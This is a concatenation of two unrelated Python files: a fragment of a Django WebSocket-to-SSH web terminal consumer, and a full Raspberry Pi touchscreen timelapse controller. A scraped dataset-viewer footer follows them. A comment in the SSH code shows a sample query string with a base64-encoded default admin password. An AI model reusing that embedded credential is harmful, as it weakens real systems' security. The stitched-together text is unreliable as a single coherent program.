# print('【Web --websocket--> WS】建立WebSocket通道,当前连接用户:', self.simple_user)
host_obj = Host.objects.get(id=self.host_id)
self.accept()
# WebSocket连接成功后,连接ssh
query_string = self.scope.get('query_string')
ws_args = QueryDict(query_string=query_string, encoding='utf-8')
# # print(ws_args)
# <QueryDict: {'user': ['admin'], 'host': ['192.168.96.20'], 'port': ['22'], 'auth': ['pwd'], 'pwd': ['ZGphbmdvYWRtaW4='], 'key': [''], 'width': ['113'], 'height': ['43']}>
# 根据参数判断是否是协作
team = ws_args.get('team')
if team:
self.is_team = True
self.team_name = "team_{}".format(self.host_id) # 加到这个通道组
async_to_sync(self.channel_layer.group_add)(
self.team_name,
self.channel_name
)
# 用户连接时,同一群组发送消息
self.send_message_or_team(json.dumps(
{'flag': 'user', 'message': '用户 {} 已连接本终端'.format(self.simple_user)}))
width = ws_args.get('width')
height = ws_args.get('height')
width = int(width)
height = int(height) # ssh连接要求int类型:required argument is an integer
ssh_connect_dict = {}
user = self.simple_user
host = host_obj.ip
port = host_obj.ssh_port
port = int(port)
auth = host_obj.ssh_user
pwd = host_obj.ssh_passwd
# if pwd:
# pwd = base64.b64decode(pwd).decode('utf-8')
sshkey_filename_path = host_obj.ssh_key.ssh_key.path if host_obj.ssh_key else None
ssh_connect_dict = {
'host': host,
'user': auth,
'port': port,
'timeout': 30,
'pty_width': width,
'pty_height': height,
'pwd': pwd
}
if sshkey_filename_path:
if not os.path.exists(sshkey_filename_path):
self.send(json.dumps(
{'flag': 'error', 'message': '密钥文件不存在'}))
else:
try:
f = open(sshkey_filename_path, 'r', encoding='utf-8')
key = f.read()
string_io = StringIO()
string_io.write(key)
string_io.flush()
string_io.seek(0)
ssh_connect_dict['key'] = string_io
# os.remove(sshkey_filename_path) # 用完之后删除key文件
except BaseException as e:
# print('打开密钥文件出错', e)
pass
# 建立SSH连接
self.ssh = SSHBridge(websocket=self, simpleuser=self.simple_user)
# print('【WS --SSHBridge--> SSH】连接SSH参数:', ssh_connect_dict)
self.ssh.connect(**ssh_connect_dict)
def disconnect(self, close_code):
# 断开连接
# print('用户 {} 断开WebSocket连接,断开SSH连接'.format(self.simple_user))
try:
if self.is_team:
# 用户连接时,同一群组发送消息
self.send_message_or_team(json.dumps(
{'flag': 'user', 'message': '用户 {} 已断开本终端'.format(self.simple_user)}))
# 退出群组
async_to_sync(self.channel_layer.group_discard)(
self.team_name,
self.channel_name
)
self.ssh.close()
except BaseException as e:
pass
def receive(self, text_data=None, bytes_data=None):
# 从WebSocket中接收消息
text_data = json.loads(text_data) # json字符串转字典
# print('\n\n【Web --websocket--> WS】Web终端按键内容通过WebSocket传到后端:', text_data)
if type(text_data) == dict:
if text_data.get('flag') == 'entered_key':
# 获取前端传过来输入的按键值,并传递给shell
data = text_data.get('entered_key', '')
# print('【WS --SSHBridge--> Func】WebSocket转发SSHBridge:', text_data)
self.ssh.shell(data=data)
else:
cols = text_data['cols']
rows = text_data['rows']
# 改变通道中终端大小
self.ssh.resize_pty(cols=cols, rows=rows)
else:
# print('【!!!】收到的数据不是dict类型')
pass
def send_message_or_team(self, message):
if self.is_team:
async_to_sync(self.channel_layer.group_send)(
self.team_name,
{
'type': 'team_message',
'message': message
}
)
else:
self.send(message)
def team_message(self, event):
message = event['message']
# 发送消息到WebSocket
self.send(message)
|
lapse.py
|
# Lapse-Pi timelapse controller for Raspberry Pi
# This must run as root (sudo python lapse.py) due to framebuffer, etc.
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
#
# Prerequisite tutorials: aside from the basic Raspbian setup and PiTFT setup
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
#
# lapse.py by David Hunt (dave@davidhunt.ie)
# based on cam.py by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
import wiringpi2
import atexit
import cPickle as pickle
import errno
import fnmatch
import io
import os
import pygame
import threading
from pygame.locals import *
from subprocess import call
from time import sleep
from datetime import datetime, timedelta
# UI classes ---------------------------------------------------------------
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None: self.callback()
else: self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
# UI callbacks -------------------------------------------------------------
# These are defined before globals because they're referenced by items in
# the global buttons[] list.
def motorCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
global motorRunning
global motorDirection
global motorpin
global motorpinA
global motorpinB
if n == 1:
motorDirection = 1
motorpin = motorpinA
if motorRunning == 0:
motorRunning = 1
gpio.digitalWrite(motorpin,gpio.HIGH)
else:
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
elif n == 2:
motorDirection = 0
motorpin = motorpinB
if motorRunning == 0:
motorRunning = 1
gpio.digitalWrite(motorpin,gpio.HIGH)
else:
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
def numericCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
global numberstring
if n < 10:
numberstring = numberstring + str(n)
elif n == 10:
numberstring = numberstring[:-1]
elif n == 11:
screenMode = 1
elif n == 12:
screenMode = returnScreen
numeric = int(numberstring)
v[dict_idx] = numeric
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode < 1: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = 1
def valuesCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
global returnScreen
global numberstring
global numeric
global v
global dict_idx
if n == -1:
screenMode = 0
saveSettings()
if n == 1:
dict_idx='Pulse'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 2:
dict_idx='Interval'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 3:
dict_idx='Images'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
def viewCallback(n): # Viewfinder buttons
global screenMode, screenModePrior
if n is 0: # Gear icon
screenMode = 1
def doneCallback(): # Exit settings
global screenMode
if screenMode > 0:
saveSettings()
screenMode = 0 # Switch back to main window
def startCallback(n): # start/Stop the timelapse thread
global t, busy, threadExited
global currentframe
if n == 1:
if busy == False:
if (threadExited == True):
# Re-instanciate the object for the next start
t = threading.Thread(target=timeLapse)
threadExited = False
t.start()
if n == 0:
if busy == True:
busy = False
t.join()
currentframe = 0
# Re-instanciate the object for the next time around.
t = threading.Thread(target=timeLapse)
def quitCallback(): # Quit confirmation button
raise SystemExit
def offCallback(): # Turn Off Rasp
os.system("sudo halt")
raise SystemExit
def timeLapse():
global v
global settling_time
global shutter_length
global motorpin
global shutterpin
global backlightpin
global busy, threadExited
global currentframe
busy = True
for i in range( 1 , v['Images'] + 1 ):
if busy == False:
break
currentframe = i
gpio.digitalWrite(motorpin,gpio.HIGH)
pulse = float(v['Pulse'])/1000.0
sleep(pulse)
gpio.digitalWrite(motorpin,gpio.LOW)
sleep(settling_time)
# disable the backlight, critical for night timelapses, also saves power
os.system("echo '0' > /sys/class/gpio/gpio252/value")
gpio.digitalWrite(shutterpin,gpio.HIGH)
sleep(shutter_length)
gpio.digitalWrite(shutterpin,gpio.LOW)
# enable the backlight
os.system("echo '1' > /sys/class/gpio/gpio252/value")
interval = float(v['Interval'])/1000.0
if (interval > shutter_length):
sleep(interval - shutter_length)
currentframe = 0
busy = False
threadExited = True
# Global stuff -------------------------------------------------------------
t = threading.Thread(target=timeLapse)
busy = False
threadExited = False
screenMode = 0 # Current screen mode; default = viewfinder
screenModePrior = -1 # Prior screen mode (for detecting changes)
iconPath = 'icons' # Subdirectory containing UI bitmaps (PNG format)
numeric = 0 # number from numeric keypad
numberstring = "0"
motorRunning = 0
motorDirection = 0
returnScreen = 0
shutterpin = 17
motorpinA = 18
motorpinB = 27
motorpin = motorpinA
backlightpin = 252
currentframe = 0
framecount = 100
settling_time = 0.2
shutter_length = 0.2
interval_delay = 0.2
dict_idx = "Interval"
v = { "Pulse": 100,
"Interval": 3000,
"Images": 150}
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [
# Screen mode 0 is main view screen of current status
[Button(( 4,180,60, 60), bg='start', cb=startCallback, value=1),
Button((67,180, 60, 60), bg='cog', cb=viewCallback, value=0),
Button((130,180,60, 60), bg='stop', cb=startCallback, value=0),
Button((193,180,60, 60), bg='quit', cb=quitCallback),
Button((256,180,60, 60), bg='off', cb=offCallback)],
# Screen 1 for changing values and setting motor direction
[Button((260, 0, 60, 60), bg='cog', cb=valuesCallback, value=1),
Button((260, 60, 60, 60), bg='cog', cb=valuesCallback, value=2),
Button((260,120, 60, 60), bg='cog', cb=valuesCallback, value=3),
Button(( 0,180,160, 60), bg='ok', cb=valuesCallback, value=-1),
Button((160,180, 70, 60), bg='left', cb=motorCallback, value=1),
Button((230,180, 70, 60), bg='right', cb=motorCallback, value=2)],
# Screen 2 for numeric input
[Button(( 0, 0,320, 60), bg='box'),
Button((180,120, 60, 60), bg='0', cb=numericCallback, value=0),
Button(( 0,180, 60, 60), bg='1', cb=numericCallback, value=1),
Button((120,180, 60, 60), bg='3', cb=numericCallback, value=3),
Button(( 60,180, 60, 60), bg='2', cb=numericCallback, value=2),
Button(( 0,120, 60, 60), bg='4', cb=numericCallback, value=4),
Button(( 60,120, 60, 60), bg='5', cb=numericCallback, value=5),
Button((120,120, 60, 60), bg='6', cb=numericCallback, value=6),
Button(( 0, 60, 60, 60), bg='7', cb=numericCallback, value=7),
Button(( 60, 60, 60, 60), bg='8', cb=numericCallback, value=8),
Button((120, 60, 60, 60), bg='9', cb=numericCallback, value=9),
Button((240,120, 80, 60), bg='del', cb=numericCallback, value=10),
Button((180,180,140, 60), bg='ok', cb=numericCallback, value=12),
Button((180, 60,140, 60), bg='cancel',cb=numericCallback, value=11)]
]
# Assorted utility functions -----------------------------------------------
def saveSettings():
global v
try:
outfile = open('lapse.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
pickle.dump(v, outfile)
outfile.close()
except:
pass
def loadSettings():
global v
try:
infile = open('lapse.pkl', 'rb')
v = pickle.load(infile)
infile.close()
except:
pass
# Initialization -----------------------------------------------------------
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
os.putenv('SDL_FBDEV' , '/dev/fb1')
os.putenv('SDL_MOUSEDRV' , 'TSLIB')
os.putenv('SDL_MOUSEDEV' , '/dev/input/touchscreen')
# Init pygame and screen
print "Initting..."
pygame.init()
print "Setting Mouse invisible..."
pygame.mouse.set_visible(False)
print "Setting fullscreen..."
modes = pygame.display.list_modes(16)
screen = pygame.display.set_mode(modes[0], FULLSCREEN, 16)
print "Loading Icons..."
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
print"Assigning Buttons"
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
# Set up GPIO pins
print "Init GPIO pins..."
gpio = wiringpi2.GPIO(wiringpi2.GPIO.WPI_MODE_GPIO)
gpio.pinMode(shutterpin,gpio.OUTPUT)
gpio.pinMode(motorpinA,gpio.OUTPUT)
gpio.pinMode(motorpinB,gpio.OUTPUT)
gpio.pinMode(motorpinB,gpio.OUTPUT)
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
# I couldnt seem to get at pin 252 for the backlight using the usual method above,
# but this seems to work
os.system("echo 252 > /sys/class/gpio/export")
os.system("echo 'out' > /sys/class/gpio/gpio252/direction")
os.system("echo '1' > /sys/class/gpio/gpio252/value")
print"Load Settings"
loadSettings() # Must come last; fiddles with Button/Icon states
print "loading background.."
img = pygame.image.load("icons/LapsePi.png")
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
pygame.display.update()
sleep(2)
# Main loop ----------------------------------------------------------------
print "mainloop.."
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
if(event.type is MOUSEBUTTONDOWN):
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
elif(event.type is MOUSEBUTTONUP):
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
if screenMode >= 0 or screenMode != screenModePrior: break
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
if screenMode == 2:
myfont = pygame.font.SysFont("Arial", 40)
label = myfont.render(numberstring, 1, (255,255,255))
screen.blit(label, (10, 2))
if screenMode == 1:
myfont = pygame.font.SysFont("Arial", 20)
label = myfont.render("Pulse:" , 1, (255,255,255))
screen.blit(label, (10, 10))
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 70))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Pulse']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 10))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 70))
label = myfont.render(str(v['Images']) , 1, (255,255,255))
screen.blit(label, (130,130))
if screenMode == 0:
myfont = pygame.font.SysFont("Arial", 20)
label = myfont.render("Pulse:" , 1, (255,255,255))
screen.blit(label, (10, 10))
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 50))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10, 90))
label = myfont.render("Remaining:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Pulse']) + "ms" , 1, (255,255,255))
screen.blit(label, (160, 10))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (160, 50))
label = myfont.render(str(currentframe) + " of " + str(v['Images']) , 1, (255,255,255))
screen.blit(label, (160, 90))
intervalLength = float((v['Pulse'] + v['Interval'] + (settling_time*1000) + (shutter_length*1000)))
remaining = float((intervalLength * (v['Images'] - currentframe)) / 1000)
sec = timedelta(seconds=int(remaining))
d = datetime(1,1,1) + sec
remainingStr = "%dh%dm%ds" % (d.hour, d.minute, d.second)
label = myfont.render(remainingStr , 1, (255,255,255))
screen.blit(label, (160, 130))
pygame.display.update()
screenModePrior = screenMode
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.